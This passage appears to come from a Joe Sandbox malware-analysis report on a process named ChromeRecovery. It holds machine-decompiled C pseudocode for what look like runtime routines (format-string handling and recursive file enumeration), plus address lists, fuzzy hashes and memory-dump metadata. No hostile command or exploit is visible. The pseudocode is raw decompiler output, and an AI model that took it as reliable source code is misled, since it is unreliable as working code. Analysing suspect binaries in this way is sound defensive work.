								_t213 =  *(_t276 + 0x1c) >> 6;
								__eflags = 1 & _t213;
								if((1 & _t213) == 0) {
									__eflags =  *(_t276 + 0x1c) & 1;
									if(( *(_t276 + 0x1c) & 1) == 0) {
										_t215 =  *(_t276 + 0x1c) >> 1;
										__eflags = 1 & _t215;
										if((1 & _t215) != 0) {
											_v16 = _t269;
											_t235 = 1;
											_v24 = 1;
										}
										goto L44;
									}
									_push(0x2b);
									L41:
									_pop(_t216);
									_t235 = 1;
									_v16 = _t216;
									_v24 = 1;
									goto L44;
								}
								_push(0x2d);
								goto L41;
							}
							L11:
							goto L113;
						}
						_t219 = _t152;
						__eflags = _t219;
						if(__eflags == 0) {
							L28:
							_t153 = E00C861CE(_t276, __eflags, _t226);
							goto L10;
						}
						__eflags = _t219 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_t153 = E00C864CD(_t276, __eflags);
						goto L10;
					}
					if(__eflags == 0) {
						_t153 = E00C8889C(__ecx);
						goto L10;
					}
					__eflags = _t151 - 0x67;
					if(_t151 <= 0x67) {
						L29:
						_t153 = E00C884EC(_t276);
						goto L10;
					}
					__eflags = _t151 - 0x69;
					if(_t151 == 0x69) {
						L27:
						_t4 = _t276 + 0x1c;
						 *_t4 =  *(_t276 + 0x1c) | 0x00000010;
						__eflags =  *_t4;
						goto L28;
					}
					__eflags = _t151 - 0x6e;
					if(_t151 == 0x6e) {
						_t153 = E00C887C8(__ecx, _t257);
						goto L10;
					}
					__eflags = _t151 - 0x6f;
					if(_t151 != 0x6f) {
						goto L11;
					}
					_t153 = E00C88869(__ecx);
					goto L10;
				}
				if(_t280 == 0) {
					goto L27;
				}
				_t281 = _t151 - _t231;
				if(_t281 > 0) {
					_t221 = _t151 - 0x5a;
					__eflags = _t221;
					if(_t221 == 0) {
						_t153 = E00C88308(__ecx);
						goto L10;
					}
					_t222 = _t221 - 7;
					__eflags = _t222;
					if(_t222 == 0) {
						goto L29;
					}
					__eflags = _t222;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t153 = E00C88721(_t276, _t257, __eflags, _t226);
					goto L10;
				}
				if(_t281 == 0) {
					_push(1);
					goto L13;
				}
				if(_t151 == _t257) {
					goto L29;
				}
				if(_t151 == 0x43) {
					goto L17;
				}
				if(_t151 <= 0x44) {
					goto L11;
				}
				if(_t151 <= 0x47) {
					goto L29;
				}
				if(_t151 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00c87e39
0x00c87e41
0x00c87e48
0x00c87e4d
0x00c87e4f
0x00c87e53
0x00c87e56
0x00c87e5a
0x00c87e5d
0x00c87e5e
0x00c87e61
0x00c87ed3
0x00c87ed6
0x00c87f26
0x00c87f26
0x00c87f29
0x00c87e8f
0x00c87e91
0x00c87e96
0x00c87e98
0x00c87f44
0x00c87f47
0x00c8824a
0x00c8824c
0x00c88259
0x00c88259
0x00c87f52
0x00c87f53
0x00c87f57
0x00c87f5a
0x00c87f5c
0x00c87f60
0x00c87f65
0x00c87f66
0x00c87f68
0x00c87f9d
0x00c87f9d
0x00c87fa3
0x00c87fa4
0x00c87fa7
0x00c87fb1
0x00c87fb9
0x00c87fbb
0x00c87fbf
0x00c87fbf
0x00c87fc2
0x00c87fcc
0x00c87fcc
0x00c87fce
0x00c87fce
0x00c87fd5
0x00c87fd7
0x00c87fdd
0x00c87fe2
0x00c87fe7
0x00c87fe8
0x00c87feb
0x00c87ff3
0x00c87ff3
0x00c87ff5
0x00c87ff5
0x00c87ffa
0x00c87ffa
0x00c87ffd
0x00c88000
0x00c88006
0x00c88008
0x00c8800c
0x00c88076
0x00c88076
0x00c8807d
0x00c88080
0x00c8808a
0x00c88090
0x00c88095
0x00c8809a
0x00c8809d
0x00c8809f
0x00c88113
0x00c88116
0x00c88116
0x00c8811a
0x00c881d0
0x00c881d0
0x00c881e0
0x00c881e5
0x00c881e5
0x00c881eb
0x00c881eb
0x00c881ee
0x00c881f0
0x00c88249
0x00000000
0x00c88249
0x00c881f5
0x00c881f8
0x00c881fa
0x00000000
0x00000000
0x00c881fc
0x00c881fe
0x00000000
0x00000000
0x00c88202
0x00c88203
0x00c88203
0x00c88208
0x00c8820b
0x00c88226
0x00c88229
0x00c8822b
0x00c8822e
0x00c88235
0x00c88238
0x00c8823a
0x00c8823a
0x00c8823d
0x00c8820d
0x00c8820d
0x00c88211
0x00c88216
0x00c88216
0x00c88213
0x00c88213
0x00c88213
0x00c8821c
0x00c8821f
0x00c8821f
0x00c8823f
0x00c88242
0x00000000
0x00000000
0x00c88244
0x00c88245
0x00c88247
0x00000000
0x00000000
0x00000000
0x00c88247
0x00000000
0x00c88203
0x00c88120
0x00c88123
0x00c88125
0x00000000
0x00000000
0x00c8812b
0x00c8812e
0x00c88131
0x00c88135
0x00c88137
0x00c8813c
0x00c8813c
0x00c8813f
0x00c88142
0x00c88145
0x00c88148
0x00c8814a
0x00000000
0x00c88150
0x00c88150
0x00c88155
0x00c88167
0x00c8816c
0x00c8816f
0x00c88172
0x00c88178
0x00c8817a
0x00000000
0x00000000
0x00c8817c
0x00c88182
0x00c88188
0x00c8818b
0x00c8819e
0x00c881a1
0x00c881ab
0x00c881ae
0x00c881b0
0x00c881b0
0x00c8818d
0x00c8818d
0x00c88191
0x00c88198
0x00c88193
0x00c88193
0x00c88193
0x00c88191
0x00c881b6
0x00c881bc
0x00c881bd
0x00c881c0
0x00c881c3
0x00c881c6
0x00000000
0x00c881c8
0x00000000
0x00c881c8
0x00c881c6
0x00c881ca
0x00000000
0x00c881ca
0x00c8814a
0x00c880a1
0x00c880a4
0x00c880a7
0x00c880aa
0x00000000
0x00000000
0x00c880ac
0x00c880af
0x00c880b1
0x00000000
0x00000000
0x00c880b3
0x00c880b5
0x00c880bb
0x00c880bb
0x00c880bd
0x00c880c0
0x00c880c5
0x00c880c8
0x00c880ce
0x00c880e9
0x00c880ee
0x00c880f5
0x00c880f8
0x00c880fa
0x00c880fa
0x00c880fd
0x00c880d0
0x00c880d0
0x00c880d3
0x00c880d7
0x00c880dc
0x00c880dc
0x00c880d9
0x00c880d9
0x00c880d9
0x00c880df
0x00c880df
0x00c880ff
0x00c88102
0x00000000
0x00000000
0x00c88107
0x00c88108
0x00c8810b
0x00c8810d
0x00000000
0x00000000
0x00000000
0x00c8810d
0x00c8810f
0x00000000
0x00c8810f
0x00c8800e
0x00c88010
0x00000000
0x00000000
0x00c88012
0x00c88015
0x00c88017
0x00c88017
0x00c8801d
0x00c88026
0x00c88029
0x00c88041
0x00c8804c
0x00c8804d
0x00c88058
0x00c8805b
0x00c88061
0x00c88061
0x00c88064
0x00c8802b
0x00c8802b
0x00c8802d
0x00c88031
0x00c88036
0x00c88036
0x00c88033
0x00c88033
0x00c88033
0x00c88039
0x00c88039
0x00c88067
0x00c8806a
0x00000000
0x00000000
0x00c8806c
0x00c8806d
0x00c8806f
0x00000000
0x00000000
0x00000000
0x00c8806f
0x00c88071
0x00c88074
0x00c88074
0x00000000
0x00c88074
0x00c87fed
0x00c87ff1
0x00000000
0x00000000
0x00000000
0x00c87ff1
0x00c87fd9
0x00c87fdb
0x00000000
0x00000000
0x00000000
0x00c87fdb
0x00c87fc4
0x00c87fc6
0x00c87fca
0x00000000
0x00000000
0x00000000
0x00c87fca
0x00c87fbd
0x00000000
0x00c87fbd
0x00c87fab
0x00c87fac
0x00c87faf
0x00000000
0x00000000
0x00000000
0x00c87faf
0x00c87f6d
0x00c87f70
0x00c87f72
0x00c87f78
0x00c87f7b
0x00c87f8e
0x00c87f90
0x00c87f92
0x00c87f94
0x00c87f98
0x00c87f9a
0x00c87f9a
0x00000000
0x00c87f92
0x00c87f7d
0x00c87f7f
0x00c87f7f
0x00c87f80
0x00c87f82
0x00c87f86
0x00000000
0x00c87f86
0x00c87f74
0x00000000
0x00c87f74
0x00c87e9e
0x00000000
0x00c87e9e
0x00c87f30
0x00c87f30
0x00c87f33
0x00c87f04
0x00c87f07
0x00000000
0x00c87f07
0x00c87f35
0x00c87f38
0x00000000
0x00000000
0x00c87f3e
0x00c87ea7
0x00c87ea9
0x00000000
0x00c87ea9
0x00c87ed8
0x00c87f1c
0x00000000
0x00c87f1c
0x00c87eda
0x00c87edd
0x00c87f0e
0x00c87f10
0x00000000
0x00c87f10
0x00c87edf
0x00c87ee2
0x00c87f00
0x00c87f00
0x00c87f00
0x00c87f00
0x00000000
0x00c87f00
0x00c87ee4
0x00c87ee7
0x00c87ef9
0x00000000
0x00c87ef9
0x00c87ee9
0x00c87eec
0x00000000
0x00000000
0x00c87ef0
0x00000000
0x00c87ef0
0x00c87e63
0x00000000
0x00000000
0x00c87e69
0x00c87e6b
0x00c87eb0
0x00c87eb0
0x00c87eb3
0x00c87ecc
0x00000000
0x00c87ecc
0x00c87eb5
0x00c87eb5
0x00c87eb8
0x00000000
0x00000000
0x00c87ebb
0x00c87ebe
0x00000000
0x00000000
0x00c87ec0
0x00c87ec3
0x00000000
0x00c87ec3
0x00c87e6d
0x00c87ea5
0x00000000
0x00c87ea5
0x00c87e71
0x00000000
0x00000000
0x00c87e7a
0x00000000
0x00000000
0x00c87e7f
0x00000000
0x00000000
0x00c87e84
0x00000000
0x00000000
0x00c87e8d
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 00C87FCE

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: cf7ac3a63b8f20c3f591d712ec76786a67022abbb365af0308a3c7d1998f4fcd
Instruction ID: c8728dba833a0d9acb667463c7a88bda65b02e970d4891653efe4717d4005b7d
Opcode Fuzzy Hash: cf7ac3a63b8f20c3f591d712ec76786a67022abbb365af0308a3c7d1998f4fcd
Instruction Fuzzy Hash: E6E1F0306046058FCB24EF69C584A6EB7F1FF45318F60464DD5669BBA0EB30EE4ACB19

Uniqueness

Uniqueness Score: -1.00%

Function 00C898C3 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00C898C3(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				char* _v28;
				signed short* _v32;
				WCHAR* _v36;
				signed int _v48;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				signed int _v612;
				signed int _v616;
				intOrPtr _v620;
				char* _v648;
				void* __ebp;
				intOrPtr _t44;
				void* _t49;
				signed int _t52;
				signed char _t54;
				void* _t63;
				intOrPtr _t65;
				int _t70;
				void* _t86;
				void* _t88;
				void* _t92;
				union _FINDEX_INFO_LEVELS _t93;
				intOrPtr* _t94;
				void* _t96;
				intOrPtr* _t99;
				intOrPtr _t102;
				void* _t104;
				char* _t105;
				void* _t113;
				signed short* _t114;
				signed int _t120;
				WCHAR* _t121;
				intOrPtr _t123;
				void* _t126;
				void* _t132;
				signed int _t133;
				void* _t134;

				_push(__ecx);
				_t99 = _a4;
				_push(__ebx);
				_push(__edi);
				_t2 = _t99 + 2; // 0x2
				_t113 = _t2;
				do {
					_t44 =  *_t99;
					_t99 = _t99 + 2;
				} while (_t44 != 0);
				_t120 = _a12;
				_t102 = (_t99 - _t113 >> 1) + 1;
				_v8 = _t102;
				if(_t102 <=  !_t120) {
					_push(__esi);
					_t5 = _t120 + 1; // 0x1
					_t92 = _t5 + _t102;
					_t126 = E00C89696(_t92, 2);
					_pop(_t104);
					if(_t120 == 0) {
						L7:
						_push(_v8);
						_t92 = _t92 - _t120;
						_t49 = E00C8B7C9(_t104, _t126 + _t120 * 2, _t92, _a4);
						_t133 = _t132 + 0x10;
						if(_t49 != 0) {
							goto L12;
						} else {
							_t123 = _a16;
							_t96 = E00C89BBC(_t123);
							if(_t96 == 0) {
								 *((intOrPtr*)( *((intOrPtr*)(_t123 + 4)))) = _t126;
								 *((intOrPtr*)(_t123 + 4)) =  *((intOrPtr*)(_t123 + 4)) + 4;
								_t96 = 0;
							} else {
								E00C89541(_t126);
							}
							E00C89541(0);
							_t86 = _t96;
							goto L4;
						}
					} else {
						_push(_t120);
						_t88 = E00C8B7C9(_t104, _t126, _t92, _a8);
						_t133 = _t132 + 0x10;
						if(_t88 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00C83466();
							asm("int3");
							_t131 = _t133;
							_t134 = _t133 - 0x264;
							_t52 =  *0xca8008; // 0x617e0cdd
							_v48 = _t52 ^ _t133;
							_t114 = _v32;
							_t105 = _v28;
							_push(_t92);
							_push(_t126);
							_push(_t120);
							_t121 = _v36;
							_v648 = _t105;
							if(_t114 != _t121) {
								while(E00C89B98( *_t114 & 0x0000ffff) == 0) {
									_t114 = _t114 - 2;
									if(_t114 != _t121) {
										continue;
									}
									break;
								}
								_t105 = _v612;
							}
							_t127 =  *_t114 & 0x0000ffff;
							if(( *_t114 & 0x0000ffff) != 0x3a || _t114 ==  &(_t121[1])) {
								_t105 =  &_v605;
								_t54 = E00C89B98(_t127);
								asm("sbb eax, eax");
								_t93 = 0;
								_v616 =  ~(_t54 & 0x000000ff) & (_t114 - _t121 >> 0x00000001) + 0x00000001;
								_t127 = FindFirstFileExW(_t121, 0,  &_v604, 0, 0, 0);
								if(_t127 != 0xffffffff) {
									_t94 = _v612;
									_v612 =  *((intOrPtr*)(_t94 + 4)) -  *_t94 >> 2;
									_t63 = 0x2e;
									do {
										if(_v604.cFileName != _t63 || _v558 != 0 && (_v558 != _t63 || _v556 != 0)) {
											_push(_t94);
											_t65 = E00C898C3(_t94, _t105, _t121, _t127,  &(_v604.cFileName), _t121, _v616);
											_t134 = _t134 + 0x10;
											_v620 = _t65;
											if(_t65 != 0) {
												FindClose(_t127);
											} else {
												goto L29;
											}
										} else {
											goto L29;
										}
										goto L34;
										L29:
										_t70 = FindNextFileW(_t127,  &_v604);
										_t63 = 0x2e;
									} while (_t70 != 0);
									_t118 =  *_t94;
									_t108 = _v612;
									_t73 =  *((intOrPtr*)(_t94 + 4)) -  *_t94 >> 2;
									if(_v612 !=  *((intOrPtr*)(_t94 + 4)) -  *_t94 >> 2) {
										E00C8D630(_t94, _t121, _t127, _t118 + _t108 * 4, _t73 - _t108, 4, E00C896F3);
									}
									FindClose(_t127);
								} else {
									_push(_v612);
									goto L20;
								}
							} else {
								_push(_t105);
								_t93 = 0;
								L20:
								E00C898C3(_t93, _t105, _t121, _t127, _t121, _t93, _t93);
							}
							L34:
							return E00C7F35B(_v12 ^ _t131);
						} else {
							goto L7;
						}
					}
				} else {
					_t86 = 0xc;
					L4:
					return _t86;
				}
			}

0x00c898c8
0x00c898c9
0x00c898cc
0x00c898cd
0x00c898d0
0x00c898d0
0x00c898d3
0x00c898d3
0x00c898d6
0x00c898d9
0x00c898de
0x00c898e7
0x00c898ea
0x00c898ef
0x00c898f8
0x00c898f9
0x00c898fc
0x00c89906
0x00c89909
0x00c8990c
0x00c89920
0x00c89920
0x00c89923
0x00c8992d
0x00c89932
0x00c89937
0x00000000
0x00c89939
0x00c89939
0x00c89943
0x00c89947
0x00c89955
0x00c89957
0x00c8995b
0x00c89949
0x00c8994a
0x00c8994f
0x00c8995f
0x00c89965
0x00000000
0x00c89967
0x00c8990e
0x00c8990e
0x00c89914
0x00c89919
0x00c8991e
0x00c8996a
0x00c8996c
0x00c8996d
0x00c8996e
0x00c8996f
0x00c89970
0x00c89971
0x00c89976
0x00c8997a
0x00c8997c
0x00c89982
0x00c89989
0x00c8998c
0x00c8998f
0x00c89992
0x00c89993
0x00c89994
0x00c89995
0x00c89998
0x00c899a0
0x00c899a2
0x00c899b5
0x00c899ba
0x00000000
0x00000000
0x00000000
0x00c899ba
0x00c899bc
0x00c899bc
0x00c899c2
0x00c899c8
0x00c899e5
0x00c899eb
0x00c899fa
0x00c899fc
0x00c89a03
0x00c89a18
0x00c89a1d
0x00c89a27
0x00c89a37
0x00c89a3d
0x00c89a3e
0x00c89a45
0x00c89a64
0x00c89a73
0x00c89a78
0x00c89a7b
0x00c89a83
0x00c89ad2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c89a85
0x00c89a8d
0x00c89a97
0x00c89a97
0x00c89a9d
0x00c89aa1
0x00c89aa7
0x00c89aac
0x00c89ac7
0x00c89acc
0x00c89aaf
0x00c89a1f
0x00c89a1f
0x00000000
0x00c89a1f
0x00c899d1
0x00c899d1
0x00c899d2
0x00c899d4
0x00c899d7
0x00c899dc
0x00c89ade
0x00c89aec
0x00000000
0x00000000
0x00000000
0x00c8991e
0x00c898f1
0x00c898f3
0x00c898f4
0x00c898f7
0x00c898f7

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 015b0c73e5cd16746df1b539abb7593c49120fce3e20598f46fe5f9df6b9bb09
Instruction ID: d69bb4e8c8d36385ac4bd98c4643a8e3acbb68ed9c6290b2288282ce9e95eff0
Opcode Fuzzy Hash: 015b0c73e5cd16746df1b539abb7593c49120fce3e20598f46fe5f9df6b9bb09
Instruction Fuzzy Hash: F331E772900219AFDB20EFB9CC85EBFB77DEB84718F184159F81997244EA30EE409B54

Uniqueness

Uniqueness Score: -1.00%

Function 00C87AF1 Relevance: 1.6, Strings: 1, Instructions: 314
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00C87AF1(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v14;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed short* _v28;
				signed int _v32;
				intOrPtr _v36;
				void* __ebp;
				signed int _t103;
				char _t105;
				signed int _t106;
				void* _t107;
				signed char _t111;
				signed int _t115;
				signed int _t119;
				signed char _t123;
				signed char _t126;
				signed int _t128;
				signed int _t133;
				signed int _t137;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t144;
				signed int _t147;
				signed char _t150;
				signed char _t152;
				signed int _t155;
				signed int _t157;
				signed int _t158;
				signed int _t162;
				void* _t164;
				intOrPtr _t170;
				unsigned int _t173;
				signed int _t176;
				signed short* _t177;
				signed char _t180;
				signed int _t182;
				signed int _t185;
				void* _t194;
				unsigned int _t195;
				void* _t196;
				signed int _t197;
				signed int* _t198;
				signed int _t200;
				intOrPtr* _t202;
				signed int _t203;
				signed int _t204;
				void* _t205;
				void* _t206;
				void* _t207;

				_t196 = __edi;
				_t103 =  *0xca8008; // 0x617e0cdd
				_v8 = _t103 ^ _t204;
				_t202 = __ecx;
				_t162 = 0;
				_t164 = 0x58;
				_t105 =  *((char*)(__ecx + 0x2d));
				_t206 = _t105 - 0x64;
				if(_t206 > 0) {
					__eflags = _t105 - 0x70;
					if(__eflags > 0) {
						_t106 = _t105 - 0x73;
						__eflags = _t106;
						if(_t106 == 0) {
							L9:
							_t107 = E00C888B2(_t202);
							L10:
							if(_t107 != 0) {
								__eflags =  *((intOrPtr*)(_t202 + 0x2c)) - _t162;
								if( *((intOrPtr*)(_t202 + 0x2c)) != _t162) {
									L92:
									L93:
									return E00C7F35B(_v8 ^ _t204);
								}
								_t195 =  *(_t202 + 0x1c);
								_v16 = _t162;
								_push(_t196);
								_t111 = _t195 >> 4;
								_v14 = _t162;
								_t197 = _t162;
								_v20 = _t197;
								__eflags = 1 & _t111;
								if((1 & _t111) == 0) {
									L44:
									_t170 =  *((intOrPtr*)(_t202 + 0x2d));
									__eflags = _t170 - 0x78;
									if(_t170 == 0x78) {
										L46:
										__eflags = 1;
										if(1 != 0) {
											L48:
											__eflags = _t170 - 0x61;
											if(_t170 == 0x61) {
												L50:
												_t115 = 1;
												L51:
												__eflags = _t115;
												if(_t115 != 0) {
													L53:
													 *((char*)(_t204 + _t197 - 0xc)) = 0x30;
													__eflags = _t170 - 0x58;
													if(_t170 == 0x58) {
														L56:
														0x78 = 0x58;
														L57:
														 *((char*)(_t204 + _t197 - 0xb)) = 0x78;
														_t197 = _t197 + 2;
														__eflags = _t197;
														_v20 = _t197;
														L58:
														_t119 =  *((intOrPtr*)(_t202 + 0x20)) -  *((intOrPtr*)(_t202 + 0x34)) - _t197;
														_v32 = _t119;
														__eflags = _t195 & 0x0000000c;
														if((_t195 & 0x0000000c) != 0) {
															L66:
															_push( *(_t202 + 8));
															_t198 = _t202 + 0x14;
															_v36 = _t202 + 0x448;
															E00C88C12(_t202 + 0x448,  &_v16, _v20, _t198);
															_t173 =  *(_t202 + 0x1c);
															_t123 = _t173 >> 3;
															__eflags = _t123 & 0x00000001;
															if((_t123 & 0x00000001) == 0) {
																L74:
																__eflags =  *((intOrPtr*)(_t202 + 0x38)) - _t162;
																if( *((intOrPtr*)(_t202 + 0x38)) == _t162) {
																	L82:
																	_push( *(_t202 + 8));
																	E00C88C12(_t202 + 0x448,  *(_t202 + 0x30),  *((intOrPtr*)(_t202 + 0x34)), _t198);
																	L83:
																	__eflags =  *_t198 - _t162;
																	if( *_t198 < _t162) {
																		L91:
																		goto L92;
																	}
																	_t126 =  *(_t202 + 0x1c) >> 2;
																	__eflags = _t126 & 0x00000001;
																	if((_t126 & 0x00000001) == 0) {
																		goto L91;
																	}
																	_t127 =  *(_t202 + 8);
																	_t203 = _v32;
																	_v28 =  *(_t202 + 8);
																	__eflags = _t203;
																	if(_t203 <= 0) {
																		goto L91;
																	} else {
																		goto L86;
																	}
																	while(1) {
																		L86:
																		_t128 = E00C88BD8(_v36, 0x20, _t127);
																		__eflags = _t128;
																		if(_t128 == 0) {
																			break;
																		}
																		_t176 =  *_t198;
																		 *_t198 = _t176 + 1;
																		__eflags = _t176 - 0xfffffffe;
																		if(_t176 == 0xfffffffe) {
																			goto L91;
																		}
																		_t127 = _v28;
																		_t162 = _t162 + 1;
																		__eflags = _t162 - _t203;
																		if(_t162 < _t203) {
																			continue;
																		}
																		goto L91;
																	}
																	 *_t198 =  *_t198 | 0xffffffff;
																	__eflags =  *_t198;
																	goto L91;
																}
																__eflags =  *((intOrPtr*)(_t202 + 0x34)) - _t162;
																if( *((intOrPtr*)(_t202 + 0x34)) <= _t162) {
																	goto L82;
																}
																_t177 =  *(_t202 + 0x30);
																_v24 = _t162;
																while(1) {
																	_v20 = _t162;
																	_v28 =  &(_t177[1]);
																	_t133 = E00C8D324(_t195,  &_v20,  &_v16, 6,  *_t177 & 0x0000ffff,  *(_t202 + 8));
																	_t205 = _t205 + 0x14;
																	__eflags = _t133;
																	if(_t133 != 0) {
																		break;
																	}
																	__eflags = _v20 - _t162;
																	if(_v20 == _t162) {
																		break;
																	}
																	_push( *(_t202 + 8));
																	E00C88C12(_t202 + 0x448,  &_v16, _v20, _t198);
																	_t177 = _v28;
																	_t137 = _v24 + 1;
																	_v24 = _t137;
																	__eflags = _t137 -  *((intOrPtr*)(_t202 + 0x34));
																	if(_t137 !=  *((intOrPtr*)(_t202 + 0x34))) {
																		continue;
																	}
																	goto L83;
																}
																 *_t198 =  *_t198 | 0xffffffff;
																goto L83;
															}
															_t180 = _t173 >> 2;
															__eflags = _t180 & 0x00000001;
															if((_t180 & 0x00000001) != 0) {
																goto L74;
															}
															_t138 =  *(_t202 + 8);
															_v28 =  *(_t202 + 8);
															_v24 = _t162;
															__eflags = _v32 - _t162;
															if(_v32 <= _t162) {
																goto L74;
															} else {
																goto L69;
															}
															while(1) {
																L69:
																_t139 = E00C88BD8(_t202 + 0x448, 0x30, _t138);
																__eflags = _t139;
																if(_t139 == 0) {
																	break;
																}
																_t182 =  *_t198;
																 *_t198 = _t182 + 1;
																__eflags = _t182 - 0xfffffffe;
																if(_t182 == 0xfffffffe) {
																	goto L74;
																}
																_t142 = _v24 + 1;
																__eflags = _t142 - _v32;
																_v24 = _t142;
																_t138 = _v28;
																if(_t142 < _v32) {
																	continue;
																}
																goto L74;
															}
															 *_t198 =  *_t198 | 0xffffffff;
															__eflags =  *_t198;
															goto L74;
														}
														_t183 =  *(_t202 + 8);
														_v28 =  *(_t202 + 8);
														_v24 = _t162;
														__eflags = _t119;
														if(_t119 <= 0) {
															goto L66;
														}
														_t200 = _v32;
														_t143 = _t202 + 0x448;
														while(1) {
															_t144 = E00C88BD8(_t143, 0x20, _t183);
															__eflags = _t144;
															if(_t144 == 0) {
																break;
															}
															_t185 =  *(_t202 + 0x14);
															 *(_t202 + 0x14) = _t185 + 1;
															__eflags = _t185 - 0xfffffffe;
															if(_t185 == 0xfffffffe) {
																goto L66;
															}
															_t183 = _v28;
															_t147 = _v24 + 1;
															_v24 = _t147;
															__eflags = _t147 - _t200;
															_t143 = _t202 + 0x448;
															if(_t147 < _t200) {
																continue;
															}
															goto L66;
														}
														_t48 = _t202 + 0x14;
														 *_t48 =  *(_t202 + 0x14) | 0xffffffff;
														__eflags =  *_t48;
														goto L66;
													}
													__eflags = _t170 - 0x41;
													if(_t170 == 0x41) {
														goto L56;
													}
													goto L57;
												}
												__eflags = _t115;
												if(_t115 == 0) {
													goto L58;
												}
												goto L53;
											}
											_t115 = _t162;
											__eflags = _t170 - 0x41;
											if(_t170 != 0x41) {
												goto L51;
											}
											goto L50;
										}
										L47:
										goto L48;
									}
									__eflags = _t170 - 0x58;
									if(_t170 != 0x58) {
										goto L47;
									}
									goto L46;
								}
								_t150 = _t195 >> 6;
								__eflags = 1 & _t150;
								if((1 & _t150) == 0) {
									__eflags = 1 & _t195;
									if((1 & _t195) == 0) {
										_t152 = _t195 >> 1;
										__eflags = 1 & _t152;
										if((1 & _t152) != 0) {
											_v16 = 0x20;
											_t197 = 1;
											_v20 = 1;
										}
										goto L44;
									}
									_v16 = 0x2b;
									L41:
									_t197 = 1;
									_v20 = 1;
									goto L44;
								}
								_v16 = 0x2d;
								goto L41;
							}
							L11:
							goto L93;
						}
						_t155 = _t106;
						__eflags = _t155;
						if(__eflags == 0) {
							L28:
							_t107 = E00C86051(_t202, __eflags, _t162);
							goto L10;
						}
						__eflags = _t155 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_t107 = E00C86350(_t202, __eflags);
						goto L10;
					}
					if(__eflags == 0) {
						_t107 = E00C88886(__ecx);
						goto L10;
					}
					__eflags = _t105 - 0x67;
					if(_t105 <= 0x67) {
						L29:
						_t107 = E00C88362(_t162, _t202);
						goto L10;
					}
					__eflags = _t105 - 0x69;
					if(_t105 == 0x69) {
						L27:
						_t3 = _t202 + 0x1c;
						 *_t3 =  *(_t202 + 0x1c) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t105 - 0x6e;
					if(_t105 == 0x6e) {
						_t107 = E00C887C8(__ecx, _t194);
						goto L10;
					}
					__eflags = _t105 - 0x6f;
					if(_t105 != 0x6f) {
						goto L11;
					}
					_t107 = E00C8884C(__ecx);
					goto L10;
				}
				if(_t206 == 0) {
					goto L27;
				}
				_t207 = _t105 - _t164;
				if(_t207 > 0) {
					_t157 = _t105 - 0x5a;
					__eflags = _t157;
					if(_t157 == 0) {
						_t107 = E00C882AE(__ecx);
						goto L10;
					}
					_t158 = _t157 - 7;
					__eflags = _t158;
					if(_t158 == 0) {
						goto L29;
					}
					__eflags = _t158;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t107 = E00C8868C(_t162, _t202, _t194, __eflags, _t162);
					goto L10;
				}
				if(_t207 == 0) {
					_push(1);
					goto L13;
				}
				if(_t105 == 0x41) {
					goto L29;
				}
				if(_t105 == 0x43) {
					goto L17;
				}
				if(_t105 <= 0x44) {
					goto L11;
				}
				if(_t105 <= 0x47) {
					goto L29;
				}
				if(_t105 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00c87af1
0x00c87af9
0x00c87b00
0x00c87b05
0x00c87b07
0x00c87b0b
0x00c87b0c
0x00c87b10
0x00c87b13
0x00c87b86
0x00c87b89
0x00c87bd9
0x00c87bd9
0x00c87bdc
0x00c87b42
0x00c87b44
0x00c87b49
0x00c87b4b
0x00c87bf7
0x00c87bfa
0x00c87e29
0x00c87e2b
0x00c87e38
0x00c87e38
0x00c87c00
0x00c87c07
0x00c87c0b
0x00c87c0c
0x00c87c10
0x00c87c13
0x00c87c15
0x00c87c18
0x00c87c1a
0x00c87c4b
0x00c87c4b
0x00c87c4e
0x00c87c51
0x00c87c58
0x00c87c5f
0x00c87c61
0x00c87c65
0x00c87c65
0x00c87c68
0x00c87c71
0x00c87c71
0x00c87c73
0x00c87c73
0x00c87c75
0x00c87c7b
0x00c87c7b
0x00c87c80
0x00c87c83
0x00c87c8e
0x00c87c90
0x00c87c91
0x00c87c91
0x00c87c95
0x00c87c95
